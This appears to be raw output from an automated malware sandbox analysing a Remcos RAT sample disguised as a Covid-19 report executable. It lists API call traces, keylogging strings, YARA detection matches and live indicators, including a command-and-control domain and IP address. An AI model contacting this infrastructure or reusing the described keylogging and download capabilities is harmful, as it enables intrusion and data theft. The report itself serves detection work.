??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,12_2_00B03325
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00B0477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QA12_2_00B0477E

                Networking:

                barindex
                C2 URLs / IPs found in malware configurationShow sources
                Source: Malware configuration extractorURLs: cato.fingusti.club
                Source: Joe Sandbox ViewASN Name: FINK-TELECOM-SERVICESCH FINK-TELECOM-SERVICESCH
                Source: Joe Sandbox ViewIP Address: 79.134.225.107 79.134.225.107
                Source: global trafficTCP traffic: 192.168.2.6:49707 -> 79.134.225.107:6609
                Source: unknownDNS traffic detected: queries for: cato.fingusti.club
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_013B2149 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,malloc,recv,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,free,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,6_2_013B2149

                Key, Mouse, Clipboard, Microphone and Screen Capturing:

                barindex
                Contains functionality to capture and log keystrokesShow sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: [Esc] 6_2_013B5EB2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: [Enter] 6_2_013B5EB2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: [Tab] 6_2_013B5EB2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: [Down] 6_2_013B5EB2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: [Right] 6_2_013B5EB2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: [Up] 6_2_013B5EB2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: [Left] 6_2_013B5EB2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: [End] 6_2_013B5EB2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: [F2] 6_2_013B5EB2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: [F1] 6_2_013B5EB2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: [Del] 6_2_013B5EB2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: [Del] 6_2_013B5EB2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: [Esc] 12_2_00B05EB2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: [Enter] 12_2_00B05EB2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: [Tab] 12_2_00B05EB2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: [Down] 12_2_00B05EB2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: [Right] 12_2_00B05EB2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: [Up] 12_2_00B05EB2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: [Left] 12_2_00B05EB2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: [End] 12_2_00B05EB2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: [F2] 12_2_00B05EB2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: [F1] 12_2_00B05EB2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: [Del] 12_2_00B05EB2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: [Del] 12_2_00B05EB2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_013BD2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait6_2_013BD2A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_013BD2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait6_2_013BD2A6
                Source: xdhqeufpq.pif, 00000004.00000002.615377643.000000000151A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_013B532D GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,6_2_013B532D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00B0532D GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,12_2_00B0532D

                E-Banking Fraud:

                barindex
                Yara detected Remcos RATShow sources
                Source: Yara matchFile source: 4.3.xdhqeufpq.pif.4a112a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.3.xdhqeufpq.pif.4d70a88.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.RegSvcs.exe.b00000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.xdhqeufpq.pif.49d0a88.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.xdhqeufpq.pif.4990a78.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.RegSvcs.exe.13b0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.xdhqeufpq.pif.49d0a88.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.RegSvcs.exe.b00000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.RegSvcs.exe.13b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.xdhqeufpq.pif.49d0a88.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.3.xdhqeufpq.pif.4d30a78.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.3.xdhqeufpq.pif.4d70a88.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.3.xdhqeufpq.pif.4db0a98.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.3.xdhqeufpq.pif.4d70a88.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000003.418699902.0000000001867000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.386707521.0000000004991000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.388209243.00000000049B1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.614438289.0000000003630000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.418686304.0000000004D51000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.421704593.0000000004D51000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.386521048.0000000004971000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.388439070.0000000004971000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.388390294.00000000049D0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.421834849.0000000001867000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.421773839.0000000004D70000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.418832919.0000000004D91000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.421808057.0000000004D11000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.421744141.0000000004D31000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.388650467.00000000048A8000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.418729526.0000000004D11000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.388336916.00000000049D0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.418713297.0000000004D31000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.417154110.0000000004D11000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.386874226.00000000049F2000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.421731075.000000000188B000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.388305317.0000000004991000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.388273489.00000000048C8000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.386594878.00000000049B1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.422168272.0000000002FA0000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.421790934.0000000004D70000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.386755735.0000000004971000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.386645318.00000000048A9000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.422028916.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: xdhqeufpq.pif PID: 6624, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6824, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: xdhqeufpq.pif PID: 6992, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5084, type: MEMORYSTR

                System Summary:

                barindex
                Malicious sample detected (through community Yara rule)Show sources
                Source: 4.3.xdhqeufpq.pif.4a112a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                Source: 4.3.xdhqeufpq.pif.4a112a0.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 8.3.xdhqeufpq.pif.4d70a88.4.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                Source: 8.3.xdhqeufpq.pif.4d70a88.4.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 12.2.RegSvcs.exe.b00000.0.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                Source: 12.2.RegSvcs.exe.b00000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 4.3.xdhqeufpq.pif.49d0a88.2.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                Source: 4.3.xdhqeufpq.pif.49d0a88.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 4.3.xdhqeufpq.pif.4990a78.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                Source: 4.3.xdhqeufpq.pif.4990a78.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 6.2.RegSvcs.exe.13b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                Source: 6.2.RegSvcs.exe.13b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 4.3.xdhqeufpq.pif.49d0a88.4.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                Source: 4.3.xdhqeufpq.pif.49d0a88.4.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 12.2.RegSvcs.exe.b00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                Source: 12.2.RegSvcs.exe.b00000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 6.2.RegSvcs.exe.13b0000.0.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                Source: 6.2.RegSvcs.exe.13b0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 4.3.xdhqeufpq.pif.49d0a88.3.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                Source: 4.3.xdhqeufpq.pif.49d0a88.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 8.3.xdhqeufpq.pif.4d30a78.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                Source: 8.3.xdhqeufpq.pif.4d30a78.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 8.3.xdhqeufpq.pif.4d70a88.3.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                Source: 8.3.xdhqeufpq.pif.4d70a88.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 8.3.xdhqeufpq.pif.4db0a98.1.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                Source: 8.3.xdhqeufpq.pif.4db0a98.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 8.3.xdhqeufpq.pif.4d70a88.2.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                Source: 8.3.xdhqeufpq.pif.4d70a88.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
                Source: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 0000000C.00000002.422028916.0000000000B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
                Source: 0000000C.00000002.422028916.0000000000B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C383C00_2_00C383C0
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C330FC0_2_00C330FC
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C5C0B00_2_00C5C0B0
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C501130_2_00C50113
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C4626D0_2_00C4626D
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C4F3CA0_2_00C4F3CA
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C433D30_2_00C433D3
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C3F5C50_2_00C3F5C5
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C505480_2_00C50548
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C5C55E0_2_00C5C55E
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C3E5100_2_00C3E510
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C326920_2_00C32692
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C466A20_2_00C466A2
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C4364E0_2_00C4364E
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C606540_2_00C60654
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C4F8C60_2_00C4F8C6
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C4589E0_2_00C4589E
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C3E9730_2_00C3E973
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C4397F0_2_00C4397F
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C3BAD10_2_00C3BAD1
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C3DADD0_2_00C3DADD
